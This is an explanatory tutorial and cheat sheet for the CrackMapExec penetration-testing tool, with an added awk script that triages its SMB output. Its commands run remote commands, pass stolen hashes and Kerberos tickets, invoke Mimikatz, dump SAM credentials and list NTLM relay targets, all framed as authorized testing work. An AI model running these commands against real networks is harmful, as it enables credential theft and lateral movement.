CrackMapExec (CME) leverages SMB (Server Message Block) and other protocols to authenticate across networks, execute commands, push payloads, and extract useful information from networked machines. This open-source toolkit, typically used alongside tools such as Metasploit, is valued for automating tasks that are slow and repetitive when done by hand, such as spraying one credential across hundreds of hosts.
The tool also helps identify systems that are susceptible to known exploits or that run configurations prone to abuse (SMB signing not required, SMBv1 still enabled, null sessions permitted). While CME is a powerful asset for legitimate security work, attackers use the same tool, which is why the weaknesses it surfaces deserve fixing rather than just reporting.
How to install CrackMapExec
Installing CrackMapExec is straightforward on most systems. CrackMapExec has three common methods used for installation, depending on your use case.
Python Installation
The developers recommend installing with pipx, which puts CME and its dependencies in an isolated virtual environment and avoids most of the dependency conflicts that break installs. Run the following commands in order:
python3 -m pip install pipx
pipx ensurepath
pipx install crackmapexec
Docker Installation
The developers also publish a Docker image. Install Docker and pull it with:
docker pull byt3bl33d3r/crackmapexec
Binary Installation
It is also possible to run the standalone binaries the developers publish on the project's GitHub releases page. Note that the page states Python 3 must be installed in order to run the tool.
How to use CrackMapExec (CME)
Using CME efficiently takes some hands-on experience. To get you started, here is a cheat sheet covering the most commonly used functions and commands. In every command below, <target-ip> can be a single IP, a hostname, a CIDR range such as 10.0.0.0/24, or a file containing one target per line.
Basic usage
- List Hosts with SMB Signing Disabled:
crackmapexec smb <target-ip> --gen-relay-list relaylist.txt
- Get SMB Shares:
crackmapexec smb <target-ip> -u <username> -p <password> --shares
- Execute Command:
crackmapexec smb <target-ip> -u <username> -p <password> -x 'command'
- Execute a PowerShell Command (the page's --ps-exec is not a CME option; -X runs the argument through PowerShell, while -x runs it through cmd.exe):
crackmapexec smb <target-ip> -u <username> -p <password> -X 'powershell command'
Authentication
- Check for Null Sessions (there is no --null-session flag; an empty username and password performs the null-session bind):
crackmapexec smb <target-ip> -u '' -p ''
- Use Hashes Instead of Password:
crackmapexec smb <target-ip> -u <username> -H <ntlmhash>
- Kerberos Authentication (Pass-the-Ticket; the flag is -k, and the ticket is supplied through the KRB5CCNAME environment variable, so target the host by FQDN rather than IP):
KRB5CCNAME=<path-to-ticket.ccache> crackmapexec smb <target-fqdn> -u <username> -k
Modules and advanced usage
- Invoke Mimikatz Module:
crackmapexec smb <target-ip> -u <username> -p <password> -M mimikatz
- Spider SMB Shares:
crackmapexec smb <target-ip> -u <username> -p <password> --spider <share-name>
- Dump SAM Database:
crackmapexec smb <target-ip> -u <username> -p <password> --sam
Output handling
- Capture Results to a File (CME has no --output option; redirect or tee its console output, and note that every run is also recorded in CME's own database, which you can query with cmedb):
crackmapexec smb <target-ip> -u <username> -p <password> --shares | tee output.txt
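Because CME prints one line per host, a captured run is easy to triage with awk. The script below is an added example, not code from CrackMapExec or from this page: it reads a constructed sample of CME's default SMB output (hostnames, IPs and the jdoe credential are made up, the line format follows what CME prints) and derives the same relay-candidate list that --gen-relay-list produces during a live scan, the hosts where the credential turned out to be local admin, and a CSV summary of the signing and SMBv1 findings for the report.

```shell
#!/usr/bin/env bash
# Added example: triage captured CrackMapExec SMB output. Not part of CME.
# The sample below is constructed; in practice it comes from e.g.
#   crackmapexec smb 10.0.0.0/24 -u jdoe -p 'Passw0rd' | tee cme-smb.txt
CME_SAMPLE='SMB         10.0.0.5        445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.0.0.7        445    WS01             [*] Windows 10.0 Build 19041 x64 (name:WS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.0.0.9        445    FS01             [*] Windows Server 2016 Build 14393 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         10.0.0.5        445    DC01             [+] corp.local\jdoe:Passw0rd
SMB         10.0.0.7        445    WS01             [+] corp.local\jdoe:Passw0rd (Pwn3d!)
SMB         10.0.0.9        445    FS01             [-] corp.local\jdoe:Passw0rd STATUS_LOGON_FAILURE'

# Hosts that do not require SMB signing: NTLM relay candidates.
# This is the selection --gen-relay-list applies on a live scan.
signing_disabled_hosts() {
    printf '%s\n' "$CME_SAMPLE" |
        awk '$1 == "SMB" && index($0, "(signing:False)") > 0 { print $2 }'
}

# Hosts where the tested credential is a local administrator
# (CME marks these with "(Pwn3d!)").
pwned_hosts() {
    printf '%s\n' "$CME_SAMPLE" |
        awk '$1 == "SMB" && index($0, "(Pwn3d!)") > 0 { print $2 }'
}

# One CSV row per host: ip,hostname,signing,smbv1,local_admin.
# Banner lines ("[*]") carry signing/SMBv1; "(Pwn3d!)" lines carry admin status.
summarize_csv() {
    printf '%s\n' "$CME_SAMPLE" | awk '
        $1 != "SMB" { next }
        $5 == "[*]" {
            ip = $2
            host[ip]    = $4
            signing[ip] = (index($0, "(signing:True)") > 0) ? "required" : "not_required"
            smbv1[ip]   = (index($0, "(SMBv1:True)") > 0)   ? "yes" : "no"
            order[++n]  = ip
        }
        index($0, "(Pwn3d!)") > 0 { admin[$2] = "yes" }
        END {
            print "ip,hostname,signing,smbv1,local_admin"
            for (i = 1; i <= n; i++) {
                ip = order[i]
                print ip "," host[ip] "," signing[ip] "," smbv1[ip] "," (ip in admin ? "yes" : "no")
            }
        }'
}

# Usage when run directly: print the report rows to stdout.
summarize_csv
```

Swap CME_SAMPLE for `cat cme-smb.txt` to run it over a real capture; the relay list written by signing_disabled_hosts is directly usable as the target file for ntlmrelayx.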
Miscellaneous
- Check for Logged in Users:
crackmapexec smb <target-ip> -u <username> -p <password> --loggedon-users
- Enumerate Members of the Local Administrators Group (--local-groups lists local groups; naming a group lists its members):
crackmapexec smb <target-ip> -u <username> -p <password> --local-groups Administrators
- Authenticate with a Local (Non-Domain) Account (--local-auth does not enumerate admins; it tells CME the supplied credential is a local account on the target rather than a domain account):
crackmapexec smb <target-ip> -u <username> -p <password> --local-auth
Use CrackMapExec responsibly and only in environments where you have permission to do so: credential spraying and remote execution can lock out accounts and disrupt production systems. Under no circumstances should you run the tool against a live environment without prior consent from the asset owners.
Key Characteristics:
- Network Efficiency: Streamlines common internal penetration-testing tasks, allowing quick identification and exploitation of target systems.
- Modular Design: Ships with a suite of modules (invoked with -M) that extend CME's functionality for different tasks.
- Automation: Can target many systems at once, automating credential testing across a range and exploiting known misconfigurations.
- Multiprotocol Support: Works not just with SMB but also with WinRM, MSSQL, LDAP, SSH, and more.
Examples:
- Real-World Example: During an internal penetration test, a security consultant uses CME to test resilience against lateral movement by attempting to authenticate across nodes with a list of known compromised credentials, noting which hosts report the credential as local admin.
- Hypothetical Scenario: After gaining an initial foothold in a corporate network, a red team member uses CME to enumerate local administrator group members and exploit misconfigurations to reach higher-privileged accounts.
Related Terms:
- Penetration Testing: The practice of simulating a cyber attack against computer systems to identify exploitable vulnerabilities.
- Lateral Movement: The techniques that cyber attackers use to move deeper into a network in search of sensitive data and assets.
- Active Directory: A directory service developed by Microsoft that provides a variety of network services, commonly a target of tools like CME during security assessments.
Learn better by watching a video? Here is a YouTube video from Hacktive Education explaining how to use CrackMapExec.